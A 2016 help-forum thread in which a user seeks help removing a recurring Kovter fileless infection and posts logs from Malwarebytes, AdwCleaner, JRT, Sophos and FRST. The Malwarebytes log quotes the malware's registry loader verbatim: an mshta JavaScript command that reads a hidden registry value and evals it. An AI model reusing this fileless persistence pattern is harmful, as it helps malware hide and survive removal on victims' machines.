Rootkit.Fileless.MTGen & Mal/KovterLnk-A & Mal/KovterBat-A


  • This topic is locked
3 replies to this topic

#1 CGTIII


Posted 16 November 2016 - 08:05 AM

Assistance appreciated. System became sluggish with long hesitations. What else should I check to make sure it's clean and how?

 

Thanks in advance.

 

Update 11/16 at 10PM: Just retested with Malwarebytes. All five items previously found are still there. Neither it nor Sophos removed them. Ugh!

 

Here are the logs:

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 11/15/2016
Scan Time: 11:03 PM
Logfile:
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.11.16.02
Rootkit Database: v2016.10.31.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: cjerald

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 388632
Time Elapsed: 9 min, 38 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Warn
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 1
Rootkit.Fileless.MTGen, HKU\S-1-5-21-3320201264-2921037059-4171379232-1148_Classes\D122CD\SHELL\OPEN\COMMAND, , [fbf7c000dac0ac8ae58b02d929d98080],

Registry Values: 3
Trojan.Fileless.MTGen, HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^pmrnby, , [e30f4f71aeec3ff7a6c8d805e41ee719],
Trojan.Fileless.MTGen, HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^wqgzvwnow, , [39b9c4fc841685b1ec83479609f97e82],
Rootkit.Fileless.MTGen, HKU\S-1-5-21-3320201264-2921037059-4171379232-1148_Classes\d122cd\SHELL\OPEN\COMMAND, "C:\Windows\system32\mshta.exe" "javascript:lM3Ob="kPSTs31";TA7=new ActiveXObject("WScript.Shell");nuN9gf="3vv";so2bW=TA7.RegRead("HKCU\\software\\auux\\onnlw");a94fzyq="RvaOBrg";eval(so2bW);PMyk2N="YI";", , [fbf7c000dac0ac8ae58b02d929d98080]

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 2
PUP.Optional.InstallCore, \\SPARTA\REDIRECTEDFOLDERS\SPARTA\REDIRECTEDFOLDERS\cjerald\MY DOCUMENTS\downloads\PDFConverterSetup.exe, , [787a1ca4cad0a88e55f2fb3eca37f010],
Rootkit.Fileless.MTGen, C:\Users\cjerald\AppData\Local\322148\83934e.bat, , [b240ba06d1c94aec3eaf2374d82b58a8],

Physical Sectors: 0
(No malicious items detected)

(end)

# AdwCleaner v6.030 - Logfile created 16/11/2016 at 01:13:33
# Updated on 19/10/2016 by Malwarebytes
# Database : 2016-11-15.1 [Server]
# Operating System : Windows 7 Professional Service Pack 1 (X64)
# Username : cjerald - PC-8
# Running from : \\SPARTA\RedirectedFolders\cjerald\Desktop\adwcleaner_6.030.exe
# Mode: Clean
# Support : hxxps://www.malwarebytes.com/support



***** [ Services ] *****



***** [ Folders ] *****



***** [ Files ] *****



***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****



***** [ Scheduled Tasks ] *****



***** [ Registry ] *****

[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\myway.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\babylonbee.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\driverupdate.net
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\babylonbee.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\driverupdate.net


***** [ Web browsers ] *****



*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

\\SPARTA\RedirectedFolders\cjerald\Desktop\AdwCleaner\AdwCleaner[C0].txt - [1242 Bytes] - [16/11/2016 01:13:33]
\\SPARTA\RedirectedFolders\cjerald\Desktop\AdwCleaner\AdwCleaner[S0].txt - [1639 Bytes] - [16/11/2016 01:08:51]

########## EOF - \\SPARTA\RedirectedFolders\cjerald\Desktop\AdwCleaner\AdwCleaner[C0].txt - [1468 Bytes] ##########

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.9 (09.30.2016)
Operating System: Windows 7 Professional x64
Ran by cjerald (Administrator) on Wed 11/16/2016 at  2:40:54.62
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 56

Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1HKDD11L (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3652F7ZL (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\38Q3BJNB (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4A9JY292 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4X7GRJQM (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5N2ARVXK (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6X9D1TY4 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77ZF5T46 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7SWM16S1 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8BV90ZNI (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8G7W3ZX1 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D7HPXVZ5 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D9K78EEG (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F05JKPI9 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FCHKSTD5 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HMHCHBDL (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I16WKLRC (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KIG48OSE (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LPU16NN4 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LRYVGLKM (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M9MOGTX9 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MD6YHPL2 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q2K6ZCZ0 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R71UV8QR (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U1SR6BF1 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X6CFLE3Y (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YZ8XVWWW (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZASANXFR (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1HKDD11L (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3652F7ZL (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\38Q3BJNB (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4A9JY292 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4X7GRJQM (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5N2ARVXK (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6X9D1TY4 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77ZF5T46 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7SWM16S1 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8BV90ZNI (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8G7W3ZX1 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D7HPXVZ5 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D9K78EEG (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F05JKPI9 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FCHKSTD5 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HMHCHBDL (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I16WKLRC (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KIG48OSE (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LPU16NN4 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LRYVGLKM (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M9MOGTX9 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MD6YHPL2 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q2K6ZCZ0 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R71UV8QR (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U1SR6BF1 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X6CFLE3Y (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YZ8XVWWW (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZASANXFR (Temporary Internet Files Folder)

Registry: 0

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Wed 11/16/2016 at  2:46:45.49
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2016-11-16 07:55:15.486    Sophos Virus Removal Tool version 2.5.6
2016-11-16 07:55:15.486    Copyright © 2009-2016 Sophos Limited. All rights reserved.

2016-11-16 07:55:15.486    This tool will scan your computer for viruses and other threats. If it finds any, it will give you the option to remove them.

2016-11-16 07:55:15.486    Windows version 6.1 SP 1.0 Service Pack 1 build 7601 SM=0x100 PT=0x1 WOW64
2016-11-16 07:55:15.486    Checking for updates...
2016-11-16 07:55:25.096    Update progress: proxy server not available
2016-11-16 07:55:31.632    Option all = no
2016-11-16 07:55:31.632    Option recurse = yes
2016-11-16 07:55:31.632    Option archive = no
2016-11-16 07:55:31.632    Option service = yes
2016-11-16 07:55:31.632    Option confirm = yes
2016-11-16 07:55:31.632    Option sxl = yes
2016-11-16 07:55:31.632    Option max-data-age = 35
2016-11-16 07:55:31.632    Option vdl-logging = yes
2016-11-16 07:55:31.648    Customer ID:    094260ca9b3af99f9d4a3909fc47a743
2016-11-16 07:55:31.648    Machine ID:    b452d6dc4eb64a91a759c04bd316660a
2016-11-16 07:55:31.663    Component SVRTcli.exe version 2.5.6
2016-11-16 07:55:31.663    Component control.dll version 2.5.6
2016-11-16 07:55:31.663    Component SVRTservice.exe version 2.5.6
2016-11-16 07:55:31.663    Component engine\osdp.dll version 1.44.1.2270
2016-11-16 07:55:31.663    Component engine\veex.dll version 3.67.0.2270
2016-11-16 07:55:31.663    Component engine\savi.dll version 9.0.5.2270
2016-11-16 07:55:31.679    Component rkdisk.dll version 1.5.31.1
2016-11-16 07:55:31.679    Version info:    Product version    2.5.6
2016-11-16 07:55:31.679    Version info:    Detection engine    3.67.0
2016-11-16 07:55:31.679    Version info:    Detection data    5.32
2016-11-16 07:55:31.679    Version info:    Build date    10/4/2016
2016-11-16 07:55:31.679    Version info:    Data files added    351
2016-11-16 07:55:31.679    Version info:    Last successful update    (not yet updated)
2016-11-16 07:55:38.574    Downloading updates...
2016-11-16 07:55:38.574    Update progress: [I96736] sdds.svrt_10: adding primary package C1A903B2-E63E-483b-982D-04BB9C457C60 RECOMMENDED baseVersion=1
2016-11-16 07:55:38.574    Update progress: [I95020] sdds.svrt_10: looking for packages included from product C1A903B2-E63E-483b-982D-04BB9C457C60 RECOMMENDED path=
2016-11-16 07:55:38.574    Update progress: [I22529] sdds.svrt_10: looking for supplements included from product C1A903B2-E63E-483b-982D-04BB9C457C60 RECOMMENDED path=
2016-11-16 07:55:38.574    Update progress: [I49502] sdds.savi0910.xml: found supplement SAVIW32 LATEST path= baseVersion= [included from product C1A903B2-E63E-483b-982D-04BB9C457C60 RECOMMENDED path=]
2016-11-16 07:55:38.574    Update progress: [I95020] sdds.savi0910.xml: looking for packages included from product SAVIW32 LATEST path=
2016-11-16 07:55:38.574    Update progress: [I22529] sdds.savi0910.xml: looking for supplements included from product SAVIW32 LATEST path=
2016-11-16 07:55:38.574    Update progress: [I49502] sdds.data0910.xml: found supplement IDE533 LATEST path= baseVersion= [included from product SAVIW32 LATEST path=]
2016-11-16 07:55:38.574    Update progress: [I95020] sdds.data0910.xml: looking for packages included from product IDE533 LATEST path=
2016-11-16 07:55:38.574    Update progress: [I22529] sdds.data0910.xml: looking for supplements included from product IDE533 LATEST path=
2016-11-16 07:55:38.574    Update progress: [I49502] sdds.data0910.xml: found supplement IDE534 LATEST path= baseVersion= [included from product IDE533 LATEST path=]
2016-11-16 07:55:38.574    Update progress: [I95020] sdds.data0910.xml: looking for packages included from product IDE534 LATEST path=
2016-11-16 07:55:38.574    Update progress: [I22529] sdds.data0910.xml: looking for supplements included from product IDE534 LATEST path=
2016-11-16 07:55:38.574    Update progress: [I49502] sdds.data0910.xml: found supplement IDE535 LATEST path= baseVersion= [included from product IDE534 LATEST path=]
2016-11-16 07:55:38.574    Update progress: [I95020] sdds.data0910.xml: looking for packages included from product IDE535 LATEST path=
2016-11-16 07:55:38.574    Update progress: [I22529] sdds.data0910.xml: looking for supplements included from product IDE535 LATEST path=
2016-11-16 07:55:38.574    Update progress: [I49502] sdds.data0910.xml: found supplement IDE536 LATEST path= baseVersion= [included from product IDE535 LATEST path=]
2016-11-16 07:55:38.574    Update progress: [I95020] sdds.data0910.xml: looking for packages included from product IDE536 LATEST path=
2016-11-16 07:55:38.574    Update progress: [I22529] sdds.data0910.xml: looking for supplements included from product IDE536 LATEST path=
2016-11-16 07:55:38.574    Update progress: [I19463] Syncing product C1A903B2-E63E-483b-982D-04BB9C457C60 RECOMMENDED path=
2016-11-16 07:55:38.901    Update progress: [I19463] Syncing product SAVIW32 LATEST path=
2016-11-16 07:55:38.901    Update progress: [I19463] Product download size 151003858 bytes
2016-11-16 07:55:41.210    Update progress: [I19463] Syncing product IDE533 LATEST path=
2016-11-16 07:55:41.210    Update progress: [I19463] Product download size 2192549 bytes
2016-11-16 07:55:41.834    Update progress: [I19463] Syncing product IDE534 LATEST path=
2016-11-16 07:55:41.834    Update progress: [I19463] Product download size 2006903 bytes
2016-11-16 07:55:42.442    Update progress: [I19463] Syncing product IDE535 LATEST path=
2016-11-16 07:55:42.442    Update progress: [I19463] Product download size 643120 bytes
2016-11-16 07:55:42.505    Update progress: [I19463] Syncing product IDE536 LATEST path=
2016-11-16 07:55:42.552    Installing updates...
2016-11-16 07:55:43.160    Error level 1
2016-11-16 07:57:22.250    Update successful
2016-11-16 07:57:45.790    Option all = no
2016-11-16 07:57:45.790    Option recurse = yes
2016-11-16 07:57:45.790    Option archive = no
2016-11-16 07:57:45.790    Option service = yes
2016-11-16 07:57:45.790    Option confirm = yes
2016-11-16 07:57:45.790    Option sxl = yes
2016-11-16 07:57:45.790    Option max-data-age = 35
2016-11-16 07:57:45.790    Option vdl-logging = yes
2016-11-16 07:57:45.806    Customer ID:    094260ca9b3af99f9d4a3909fc47a743
2016-11-16 07:57:45.806    Machine ID:    b452d6dc4eb64a91a759c04bd316660a
2016-11-16 07:57:45.806    Component SVRTcli.exe version 2.5.6
2016-11-16 07:57:45.806    Component control.dll version 2.5.6
2016-11-16 07:57:45.806    Component SVRTservice.exe version 2.5.6
2016-11-16 07:57:45.806    Component engine\osdp.dll version 1.44.1.2270
2016-11-16 07:57:45.806    Component engine\veex.dll version 3.67.0.2270
2016-11-16 07:57:45.806    Component engine\savi.dll version 9.0.5.2270
2016-11-16 07:57:45.806    Component rkdisk.dll version 1.5.31.1
2016-11-16 07:57:45.806    Version info:    Product version    2.5.6
2016-11-16 07:57:45.806    Version info:    Detection engine    3.67.0
2016-11-16 07:57:45.806    Version info:    Detection data    5.32
2016-11-16 07:57:45.806    Version info:    Build date    10/4/2016
2016-11-16 07:57:45.806    Version info:    Data files added    351
2016-11-16 07:57:45.806    Version info:    Last successful update    11/16/2016 2:57:22 AM

2016-11-16 08:10:19.121    Could not open C:\hiberfil.sys
2016-11-16 08:10:25.922    Could not open C:\pagefile.sys
2016-11-16 08:43:23.038    Could not open C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\CmnClnt\_lck\_RDRPluginG
2016-11-16 08:43:23.038    Could not open C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\CmnClnt\_lck\_SNDPluginG
2016-11-16 08:43:35.502    Could not open C:\System Volume Information\{1ad435e9-aa72-11e6-b3a1-001e8cf5a0bc}{3808876b-c176-4e48-b7ae-04046e6cc752}
2016-11-16 08:43:35.502    Could not open C:\System Volume Information\{1bbe25d5-a5b5-11e6-b39e-001e8cf5a0bc}{3808876b-c176-4e48-b7ae-04046e6cc752}
2016-11-16 08:43:35.502    Could not open C:\System Volume Information\{1c725936-a68a-11e6-9b36-001e8cf5a0bc}{3808876b-c176-4e48-b7ae-04046e6cc752}
2016-11-16 08:43:35.502    Could not open C:\System Volume Information\{3808876b-c176-4e48-b7ae-04046e6cc752}
2016-11-16 08:43:35.502    Could not open C:\System Volume Information\{578b4698-a4ed-11e6-8fda-001e8cf5a0bc}{3808876b-c176-4e48-b7ae-04046e6cc752}
2016-11-16 08:43:35.502    Could not open C:\System Volume Information\{918143a1-abc4-11e6-b3dc-001e8cf5a0bc}{3808876b-c176-4e48-b7ae-04046e6cc752}
2016-11-16 08:43:35.502    Could not open C:\System Volume Information\{9181533c-abc4-11e6-b3dc-001e8cf5a0bc}{3808876b-c176-4e48-b7ae-04046e6cc752}
2016-11-16 08:43:35.502    Could not open C:\System Volume Information\{f304f19d-aabb-11e6-a8ad-001e8cf5a0bc}{3808876b-c176-4e48-b7ae-04046e6cc752}
2016-11-16 08:46:45.431    >>> Virus 'Mal/KovterLnk-A' found in file C:\Users\cjerald\AppData\Local\322148\4c5510.lnk
2016-11-16 08:46:45.431    >>> Virus 'Mal/KovterLnk-A' found in file HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ehshell.exe
2016-11-16 08:46:45.431    >>> Virus 'Mal/KovterLnk-A' found in file HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ehshell.exe
2016-11-16 08:46:45.431    >>> Virus 'Mal/KovterLnk-A' found in file HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
2016-11-16 08:46:45.431    >>> Virus 'Mal/KovterLnk-A' found in file HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
2016-11-16 08:46:45.431    >>> Virus 'Mal/KovterLnk-A' found in file HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
2016-11-16 08:50:01.413    >>> Virus 'Mal/KovterBat-A' found in file C:\Users\cjerald\AppData\Local\322148\83934e.bat
2016-11-16 08:50:01.413    >>> Virus 'Mal/KovterBat-A' found in file HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ehshell.exe
2016-11-16 08:50:01.413    >>> Virus 'Mal/KovterBat-A' found in file HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ehshell.exe
2016-11-16 08:50:01.413    >>> Virus 'Mal/KovterBat-A' found in file HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
2016-11-16 08:50:01.413    >>> Virus 'Mal/KovterBat-A' found in file HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
2016-11-16 08:50:01.413    >>> Virus 'Mal/KovterBat-A' found in file HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
2016-11-16 09:38:17.741    >>> Virus 'Mal/KovterLnk-A' found in file C:\Windows\CSC\v2.0.6\namespace\sparta\RedirectedFolders\cjerald\Start Menu\Programs\Startup\756f18.lnk
2016-11-16 09:38:17.741    >>> Virus 'Mal/KovterLnk-A' found in file HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
2016-11-16 09:38:17.741    >>> Virus 'Mal/KovterLnk-A' found in file HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
2016-11-16 09:38:17.741    >>> Virus 'Mal/KovterLnk-A' found in file HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
2016-11-16 09:41:33.707    >>> Virus 'Mal/KovterLnk-A' found in file C:\Windows\CSC\v2.0.6\namespace\sparta\RedirectedFolders\cjerald\Start Menu\Programs\Startup\96da9b.lnk
2016-11-16 09:41:33.707    >>> Virus 'Mal/KovterLnk-A' found in file HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
2016-11-16 09:41:33.707    >>> Virus 'Mal/KovterLnk-A' found in file HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
2016-11-16 09:41:33.707    >>> Virus 'Mal/KovterLnk-A' found in file HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
2016-11-16 09:48:40.240    Could not open C:\Windows\System32\catroot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdb
2016-11-16 09:48:40.240    Could not open C:\Windows\System32\catroot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb
2016-11-16 09:49:08.944    Could not open C:\Windows\System32\config\RegBack\DEFAULT
2016-11-16 09:49:08.944    Could not open C:\Windows\System32\config\RegBack\SAM
2016-11-16 09:49:08.944    Could not open C:\Windows\System32\config\RegBack\SECURITY
2016-11-16 09:49:08.944    Could not open C:\Windows\System32\config\RegBack\SOFTWARE
2016-11-16 09:49:08.944    Could not open C:\Windows\System32\config\RegBack\SYSTEM
2016-11-16 10:23:11.984    Could not open LOGICAL:0003:00000000
2016-11-16 10:23:11.984    Could not open D:\
2016-11-16 10:23:44.651    The following items will be cleaned up:
2016-11-16 10:23:44.651    Mal/KovterLnk-A
2016-11-16 10:23:44.651    Mal/KovterBat-A
 


Edited by CGTIII, 16 November 2016 - 10:26 PM.




#2 CGTIII


Posted 19 November 2016 - 04:37 PM

Update:
Yesterday I also attempted current version of ComboFix, Malwarebytes Anti-Rootkit, and Panda Anti-rootkit. Still reappears in Malwarebytes afterward. (Rebooting after each, of course.)

Then tried Malwarebytes Anti-Rootkit, and Panda Anti-rootkit in Safe Mode. Rebooted after each. Still reappears in Malwarebytes afterward.

Also tried Sophos.

 

Today tried to manually remove the registry entries and .bat file. They reappeared within 2 seconds!

 

Help! Anybody there?

 

Here are the FRST logs:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 19-11-2016 01
Ran by CJerald (administrator) on PC-8 (19-11-2016 16:32:37)
Running from \\SPARTA\RedirectedFolders\cjerald\Desktop
Loaded Profiles: CJerald (Available Profiles: Clayton & CJerald)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: "C:\Program Files (x86)\Slimjet\slimjet.exe" -- "%1")
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
() C:\Program Files (x86)\Backblaze\bzserv.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(Intel® Corporation) C:\Program Files\Intel\BCA\pabeSvc64.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\ramaint.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Pervasive Software Inc.) C:\Program Files (x86)\Pervasive Software\PSQL\bin\w3dbsmgr.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
